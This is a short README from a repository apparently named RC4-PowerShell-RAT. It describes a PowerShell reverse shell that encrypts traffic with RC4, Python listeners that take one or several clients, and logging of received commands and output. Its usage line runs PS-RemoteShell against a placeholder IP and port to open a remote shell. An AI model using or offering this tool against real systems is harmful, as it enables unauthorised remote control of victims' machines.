5l1v3r1/RC4-PowerShell-RAT/README.md

 # RC4-PowerShell-RAT
 Simple powershell reverse shell using RC4 encryption for all the commands and payloads.
 PsShellClient.py only accept one client at the time.
 MultiPsShellClient.py accept several clients at the time.

+The RAT will also save all the commands and output received in a log file.

 # Usage
 ```
 PS-RemoteShell -ip 1.1.1.1 -port 1111 -key test